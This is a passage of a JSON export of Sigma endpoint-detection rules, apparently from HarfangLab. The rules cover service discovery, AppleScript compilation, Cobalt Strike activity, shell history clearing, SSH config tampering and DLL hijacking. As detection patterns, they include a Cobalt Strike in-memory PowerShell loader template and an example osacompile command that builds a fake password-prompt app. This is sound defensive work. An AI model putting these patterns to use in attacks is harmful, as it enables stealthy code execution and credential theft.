'?:\\Windows\\system32\\cmd.exe /d /s /c net start | findstr Hexaflux'\n Ancestors|endswith: '\\hexaflux\\admin\\\\*|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|?:\\Program Files (x86)\\SAM\\RollCallSuite\\RollProxyConfigurator.exe|'\n - '|?:\\Program Files\\Dell\\SysMgt\\cm\\invcol\\invCol.exe|'\n - '|?:\\eGurkha\\JRE\\bin\\java.exe|'\n\n exclusion_ccmcache:\n CurrentDirectory|startswith: '?:\\Windows\\ccmcache\\'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0d5af151-1912-4b7d-aa38-cacd25e43f67",
"rule_name": "System Service Discovered via net.exe",
"rule_description": "Detects the execution of net1.exe with start option.\nAdversaries can use this command during discovery phase to enumerate started system services.\nIt is recommended to investigate the parent process to look for malicious content or other malicious actions.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-02-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1007"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0e0dad90-5301-41c4-a880-808713de6f5d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618007Z",
"creation_date": "2026-03-23T11:45:34.618009Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618014Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/pl_pl/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html",
"https://attack.mitre.org/techniques/T1059/002/"
],
"name": "t1059_002_osacompile_execution.yml",
"content": "title: Apple Script Compiled via Osacompile\nid: 0e0dad90-5301-41c4-a880-808713de6f5d\ndescription: |\n Detects the execution of osacompile to compile an Apple Script.\n This could be used by an attacker to hide malicious behaviour under a compiled app bundle (ADHOC code signed).\n It is recommended to investigate the program that triggered the compilation and what was compiled to determine whether this action was legitimate.\nreferences:\n - https://www.trendmicro.com/pl_pl/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html\n - https://attack.mitre.org/techniques/T1059/002/\ndate: 2022/11/14\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Osascript\n - classification.macOS.LOLBin.Osacompile\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n # osacompile -e 'display dialog \"Password\" default answer \"\" with icon note buttons {\"Cancel\", \"Continue\"} default button \"Continue\"' -o MaliciousApp.app\n selection:\n Image: '/usr/bin/osacompile'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0e0dad90-5301-41c4-a880-808713de6f5d",
"rule_name": "Apple Script Compiled via Osacompile",
"rule_description": "Detects the execution of osacompile to compile an Apple Script.\nThis could be used by an attacker to hide malicious behaviour under a compiled app bundle (ADHOC code signed).\nIt is recommended to investigate the program that triggered the compilation and what was compiled to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0e0fd26d-b447-4686-acd2-ce93cce97b88",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091588Z",
"creation_date": "2026-03-23T11:45:34.091590Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091595Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://gchq.github.io/CyberChef/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/software/S0154/"
],
"name": "t1059_001_cobalt_powershell_compress.yml",
"content": "title: Cobalt Strike PowerShell Compressed Payload Detected\nid: 0e0fd26d-b447-4686-acd2-ce93cce97b88\ndescription: |\n Detects the execution of a Cobalt Strike standard compressed payload template via PowerShell.\n The goal of the payload is to create a connection to the team server to allow an attacker to interact with the machine.\n It is recommended to isolate the machine and identify how the script was executed on the host. Tools like CyberChef can be used to decode this payload.\nreferences:\n - https://gchq.github.io/CyberChef/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/software/S0154/\ndate: 2021/11/22\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.s0154\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.MemoryExecution\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand: '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"*\"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0e0fd26d-b447-4686-acd2-ce93cce97b88",
"rule_name": "Cobalt Strike PowerShell Compressed Payload Detected",
"rule_description": "Detects the execution of a Cobalt Strike standard compressed payload template via PowerShell.\nThe goal of the payload is to create a connection to the team server to allow an attacker to interact with the machine.\nIt is recommended to isolate the machine and identify how the script was executed on the host. Tools like CyberChef can be used to decode this payload.\n",
"rule_creation_date": "2021-11-22",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0e12c12e-bea2-428e-ad86-734dcc2aff20",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073062Z",
"creation_date": "2026-03-23T11:45:34.073064Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073069Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/",
"https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575",
"https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/",
"https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8",
"https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752",
"https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1021_002_custom_cobaltstrike_named_pipes_created.yml",
"content": "title: Custom CobaltStrike Named Pipe Created\nid: 0e12c12e-bea2-428e-ad86-734dcc2aff20\ndescription: |\n Detects the creation of a Named Pipe pertaining to the CobaltStrike framework.\n These are custom CobaltStrike Named Pipe as seen in previous attacks.\n CobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\n It is recommended to investigate the process that created the named pipe to determine its legitimacy.\nreferences:\n - https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/\n - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\n - https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/\n - https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8\n - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752\n - https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName:\n - '\\mojo.5688.8052.183894939787088877*'\n - '\\mojo.5688.8052.35780273329370473*'\n - '\\scerpc_*'\n - '\\win_svc*'\n - '\\demoagent_11*'\n - '\\demoagent_22*'\n - '\\Winsock2\\CatalogChangeListener-*-0,'\n - '\\wkssvc_??'\n - '\\ntsvcs??'\n - '\\DserNamePipe??'\n - '\\PGMessagePipe??'\n - '\\SearchTextHarvester??'\n - '\\mypipe-f??'\n - '\\mypipe-h??'\n - '\\windows.update.manager??'\n - '\\windows.update.manager???'\n - '\\MsFteWds??'\n - '\\f4c3??'\n - '\\f53f??'\n - '\\fullduplex_??'\n - '\\msrpc_????'\n - '\\win\\msrpc_??'\n - '\\rpc_??'\n - '\\spoolss_??'\n # https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\n - '\\ProtectionManager_????_??'\n - '\\ProtectionManager_??'\n - '\\Winsock2\\\\CatalogChangeListener-???????-1'\n - '\\Winsock2\\\\CatalogChangeListener-??-??'\n - '\\Spool\\\\pipe_????_??'\n - '\\Spool\\\\pipe_??'\n - '\\WkSvcPipeMgr_??????'\n - '\\WkSvcPipeMgr_??'\n - '\\NetClient_??????'\n - '\\NetClient_??'\n - '\\RPC_??????'\n - '\\WiFiNetMgr????_??'\n - '\\WiFiNetMgr_??'\n - '\\AuthPipeD_??'\n\n exclusion_trendmicro:\n PipeName:\n - '\\f4c3??'\n - '\\f53f??'\n ProcessImage:\n - '?:\\Program Files\\Trend Micro\\\\*'\n - '?:\\Program Files (x86)\\Trend Micro\\\\*'\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0e12c12e-bea2-428e-ad86-734dcc2aff20",
"rule_name": "Custom CobaltStrike Named Pipe Created",
"rule_description": "Detects the creation of a Named Pipe pertaining to the CobaltStrike framework.\nThese are custom CobaltStrike Named Pipe as seen in previous attacks.\nCobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\nIt is recommended to investigate the process that created the named pipe to determine its legitimacy.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0e2c06ef-3fca-4f1b-8f83-5b01fc0f4dcb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598235Z",
"creation_date": "2026-03-23T11:45:34.598241Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598253Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1070/003/"
],
"name": "t1070_003_history_file_removed_macos.yml",
"content": "title: Shell History File Cleared (macOS)\nid: 0e2c06ef-3fca-4f1b-8f83-5b01fc0f4dcb\ndescription: |\n Detects the history file being removed.\n Attackers may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.\n It is recommended to investigate other malicious actions that may have been taken by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1070/003/\ndate: 2022/11/25\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Deletion\n - classification.macOS.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_binary1:\n Image:\n - '/bin/rm'\n - '/bin/unlink'\n - '/bin/dd'\n - '/usr/bin/truncate'\n\n selection_binary2:\n Image:\n - '/bin/cat'\n - '/bin/echo'\n CommandLine|contains: \">\"\n\n selection_commandline:\n CommandLine|contains:\n - '.bash_history'\n - 'fish_history'\n - '.history'\n - '.sh_history'\n - '.zhistory'\n - '.zsh_history'\n\n # /bin/rm /Users//.zsh_sessions/.historynew\n exclusion_zsh_sessions:\n Image: '/bin/rm'\n CommandLine|endswith: '.historynew'\n\n exclusion_cursor:\n - GrandparentImage: '/Applications/Cursor.app/Contents/Frameworks/Cursor Helper (Plugin).app/Contents/MacOS/Cursor Helper (Plugin)'\n - ParentImage: '/Applications/Cursor.app/Contents/MacOS/Cursor'\n\n exclusion_vscode:\n ParentImage:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Applications/Visual Studio Code.app/Contents/MacOS/Electron'\n\n condition: (1 of selection_binary* and selection_commandline) and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0e2c06ef-3fca-4f1b-8f83-5b01fc0f4dcb",
"rule_name": "Shell History File Cleared (macOS)",
"rule_description": "Detects the history file being removed.\nAttackers may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.\nIt is recommended to investigate other malicious actions that may have been taken by the parent process.\n",
"rule_creation_date": "2022-11-25",
"rule_modified_date": "2025-04-08",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0e4aa7c9-6644-49db-905a-46646475b8a2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.726662Z",
"creation_date": "2026-03-23T11:45:35.297664Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297668Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1021/004/",
"https://attack.mitre.org/techniques/T1563/001/",
"https://attack.mitre.org/techniques/T1484/"
],
"name": "t1021_004_ssh_server_config_modified_linux.yml",
"content": "title: Suspicious Modification of the SSH Server Configuration\nid: 0e4aa7c9-6644-49db-905a-46646475b8a2\ndescription: |\n Detects an attempt to modify the SSH server configuration file, which contains security settings.\n Attackers may alter these settings to weaken security.\n It is recommended to review file changes by downloading the file through a job, check access permissions and assess risks from these changes.\nreferences:\n - https://attack.mitre.org/techniques/T1021/004/\n - https://attack.mitre.org/techniques/T1563/001/\n - https://attack.mitre.org/techniques/T1484/\ndate: 2022/11/07\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.004\n - attack.t1563.001\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1484\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.ConfigChange\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/ssh/sshd_config'\n - TargetPath: '/etc/ssh/sshd_config'\n\n filter_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_apk:\n - ProcessImage: '/sbin/apk'\n - ProcessParentImage: '/sbin/apk'\n - ProcessGrandparentImage: '/sbin/apk'\n - ProcessAncestors|contains: '|/usr/bin/apt|'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/openssh-server.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n - 'dnf upgrade'\n - 'dnf upgrade --refresh'\n - 'dnf update'\n\n exclusion_sophos:\n ProcessImage: '/opt/sophos-av/engine/_/savscand.?'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_chmod:\n ProcessImage: '/bin/chmod'\n\n exclusion_denyhost_sshd:\n ProcessCommandLine|startswith: '/usr/bin/perl /usr/sbin/denyhost-sshd-plugin'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/local/bin/dockerd'\n - '/usr/bin/dockerd-ce'\n - ProcessAncestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/local/bin/containerd-shim-runc-v2|'\n exclusion_docker2:\n ProcessImage|endswith: '/bin/dockerd'\n ProcessCommandLine: 'docker-applyLayer *'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_puppet:\n - ProcessImage|startswith: '/opt/puppetlabs/'\n - ProcessParentImage|startswith: '/opt/puppetlabs/'\n - ProcessCommandLine|contains: '/usr/bin/puppet agent'\n\n exclusion_puppet2:\n ProcessParentCommandLine: 'puppet agent: applying configuration'\n\n exclusion_qradar:\n ProcessCommandLine|startswith: '/bin/bash /opt/qradar/bin/post-deploy.sh'\n\n exclusion_puppet3:\n ProcessParentImage|startswith: '/opt/puppetlabs/'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0e4aa7c9-6644-49db-905a-46646475b8a2",
"rule_name": "Suspicious Modification of the SSH Server Configuration",
"rule_description": "Detects an attempt to modify the SSH server configuration file, which contains security settings.\nAttackers may alter these settings to weaken security.\nIt is recommended to review file changes by downloading the file through a job, check access permissions and assess risks from these changes.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1021.004",
"attack.t1484",
"attack.t1563.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0e5eb5ea-f9ef-45a5-9a7e-5e812658c6c1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088331Z",
"creation_date": "2026-03-23T11:45:34.088333Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088337Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bootim.yml",
"content": "title: DLL Hijacking via bootim.exe\nid: 0e5eb5ea-f9ef-45a5-9a7e-5e812658c6c1\ndescription: |\n Detects potential Windows DLL Hijacking via bootim.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bootim.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\BootMenuUX.DLL'\n - '\\bootux.dll'\n - '\\Cabinet.dll'\n - '\\dbghelp.dll'\n - '\\DismApi.DLL'\n - '\\FLTLIB.DLL'\n - '\\OLEACC.dll'\n - '\\PROPSYS.dll'\n - '\\ReAgent.dll'\n - '\\ResetEng.dll'\n - '\\tbs.dll'\n - '\\VirtDisk.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\WDSCORE.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: 